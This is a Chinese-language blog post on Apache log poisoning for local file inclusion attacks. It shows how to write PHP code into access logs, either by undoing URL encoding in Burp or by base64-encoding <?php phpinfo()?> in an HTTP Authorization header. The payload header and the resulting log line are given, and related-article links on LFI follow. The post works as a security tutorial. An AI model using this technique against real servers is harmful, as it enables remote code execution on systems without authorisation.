php 脚本 嵌入,Apache日志中嵌入php脚本的两种方法(在LFI中使用)

最新推荐文章于 2021-05-10 23:08:11 发布
最新推荐文章于 2021-05-10 23:08:11 发布
阅读量102 收藏
点赞数
文章标签: php 脚本 嵌入

ps:其实上面的参考文章中有错误之处,即在浏览器中直接访问时加上<?php phpinfo()?>这样的代码会在日志文件中被url编码是因为浏览器自动进行url编码造成的,因此只要通过burp将其修改回来即可。

简介:Apache的日志默认存储在安装目录下的logs文件夹下,主要有访问日志和错误日志。在Windows下这两个日志文件为access.log和error.log,Linux下是access_log和error_log。其中access.log/access_log访问日志记录了所有对Web服务器的访问活动。格式如下:

192.168.5. 66- - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876

1.远程主机、2.空白(E-mail)、3.空白(登录名)、4.请求时间、5.方法+资源+协议、6.状态代码、7.发送字节数

方法一:

即在浏览器中直接访问,然后用burp抓包,将编码的部分修改回来即可。

20140508215013.jpg

20140508215346.jpg

方法二:

利用HTTP HEADER中Authorization字段,该字段是用来发送用于HTTP AUTH认证的信息,其值的格式为”Basic base64(User:Pass)”。据此,我们重新构造payload如下:

URL地址:http:// 192.168.5.115/test.php

HTTP HEAD中添加:Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=

注:PD9waHAgcGhwaW5mbygpPz46MTIzNTY==为base64(<?php phpinfo()?>:12356) 利用此方法可成功将正确的PHP代码写入日志如下:

192.168.5.115 – <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] “GET /test.php HTTP/1.1” 200 2735

20140508215629.jpg

小宏i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
apache %3c php,php包含apache日志写马
weixin_32506761的博客
03-24 2572
来源http://diehack.webnode.com/news/php%E5%8C%85%E5%90%ABapache%E6%97%A5%E5%BF%97%E5%86%99%E9%A9%AC/另外一篇 http://lvhuana.bokee.com/6380079.html经测试是可行的。。因为上面那个很不实际,我在测试发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就...
php已经安装好了如何追加到apache,如何向已经安装好的apache添加一个模块
weixin_28699741的博客
03-26 180
以前一直有这样的需求,是说apache缺少我需要的模块,可是如何在不影响现有程序的基础上,直接添加一个loadModule呢,但是模块文件从哪里来?从另外一个系统复制一份过来是否可行?虽然只是一个 foo.so 文件,放到module文件夹就可以了,但我还是查了一下资料,找到合适的方法,并且尝试过了。这个是原文:引用apache 添加 mod_rewrite 模块我使用的是httpd 2.0.55...
apache %3c php,关于php包含Apache日志的随想
weixin_35238815的博客
03-24 998
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句 i...
PHP如何实现嵌入网页功能思路
kitt15的博客
11-24 7971
1、首先生成需要展示的html静态页面。
php嵌入html代码的三种方法
热门推荐
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
08-05 5万+
php添加HTML代码,就是php类型的文件添加html代码~ 第一种是在HTMLPHP。 大段大段的html代码,在各个需要执行php的地方&lt;?php .... ?&gt; 比如 line7-9: 1 &lt;head&gt; 2 &lt;meta http-equiv="Content-Type" content="text/html; charset=...
Apache Nginx 禁止目录执行PHP脚本文件的方法
09-30
Apache和Nginx是互联网上广泛使用两种Web服务器软件,它们用于托管网站和提供网页内容。尽管它们的工作原理不同,但都支持PHP脚本语言,因此可以运行PHP编写的网页应用。在网站部署过程,出于安全考虑,有时候...
vulnerable:Php 脚本易受 SQLi、XSS、RFI 和 LFI 攻击,用于测试目的
06-05
在IT安全领域,尤其是Web应用安全,SQL注入(SQLi)、跨站脚本攻击(XSS)、远程文件包含(RFI)和本地文件包含(LFI)是四种常见的漏洞类型。这些漏洞通常源于PHP编程的错误或疏忽,使得攻击者能够利用它们执行...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php过滤器将...
k4l0ng_WAF:broute通过PHP使用AWD检测WAF
05-10
php编写的通防K4l0nG_WAF几乎能抵御所有web层能导致getshell的攻击(暴力)在多次线下攻防比赛表现优异,几乎没有被攻破添加日志记录,流量记录功能简洁日志all_requests.txt记录的类似于apache日志,但是它能...
html代码嵌入php代码常用的一种方式
weixin_38728964的博客
06-27 5595
&lt;div&gt;&lt;!--{if $list}--&gt;    &lt;!--{loop $list $v}--&gt;        &lt;li&gt;        &lt;/li&gt;    &lt;!--{/loop}--&gt;&lt;!--{else}--&gt;    &lt;li&gt;    &lt;/li&gt;&lt;!
在HTML嵌入PHP
张海涛的专栏
03-11 5639
1、把PHP嵌入HTML PHP是可以与HTML混合使用嵌入式语言,然而成千上万的代码,然而如何做到区分HTML与PHP呢,PHP分解符(tags)如同界石,准确标示着PHP脚本的开始与结束位置。有四种分解符可以让PHP嵌入到HTML。 (1):PhP标准的分解符。 (2):简写的分解符。 (3)和:javaScript/VBScript风格分解符 (4):ASP分解符。 其第一
为什么在.html文件嵌入php代码没效果
lloha的博客
06-15 2万+
问题: 原因:
php可以做嵌入式吗,嵌入PHP
weixin_28622215的博客
03-09 918
从第一章PHP源码目录结构的介绍以及PHP生命周期章节可以看出,嵌入PHP类似CLI,是SAPI接口的另一种实现。 一般情况下,它的一个请求的生命周期也会和其它的SAPI一样:模块初始化=>请求初始化=>处理请求=>关闭请求=>关闭模块。当然,这只是理想情况。 但是嵌入PHP的请求可能包括一段或多段代码,这就导致了嵌入PHP的特殊性。对于嵌入PHP或许我们了解...
php:html嵌入php代码,php嵌入html代码
qq_44077052的博客
10-25 2万+
html嵌入php代码(以.html结尾的文件) index.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>错误:html嵌套php</title> </head> <body> <?php echo 'hello world'?> </body> </html
如何在html文件嵌入php代码
白糕茶的博客
12-02 1万+
在html文件嵌入php代码时会发现页面显示并没有达到预期效果,原因是服务器在解析html文件时没有解析php代码部分,除了修改后缀名为php之外还可以修改httpd.conf文件,具体修改如下:将 AddType application/x-httpd-php .php .phtmlAddType application/x-httpd-php-source .pps 修改为 AddTyp
PHP和HTML混合编写
Dev-Liangjian的博客
05-27 1万+
1 单/双引号包围法,在PHP输出HTML代码 echo输出HTML即可 &lt;?php echo ' &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;直接echo输出HTML页面&lt;/title&gt; &lt;/head&gt; &lt;body&gt;
文件包含漏洞(LFI、RFI)(require()、include()函数)
Hardworking666的博客
05-10 4724
文章目录一、文件包含漏洞二、文件包含函数二、文件包含漏洞实例“百度杯”CTF比赛 2017 二月场include 一、文件包含漏洞 文件包含漏洞,是程序员在网站设计,为方便自己在设计构架时,使用了一些包含的函数,在文件,包含一个文件。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。 这意味着可以创建供所有网页引用的标准页眉或菜单文件。 当页眉需要更新时,只更新一个包含文件就可以了,或者当向网站添加一张新页面时,仅仅需要修改一..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值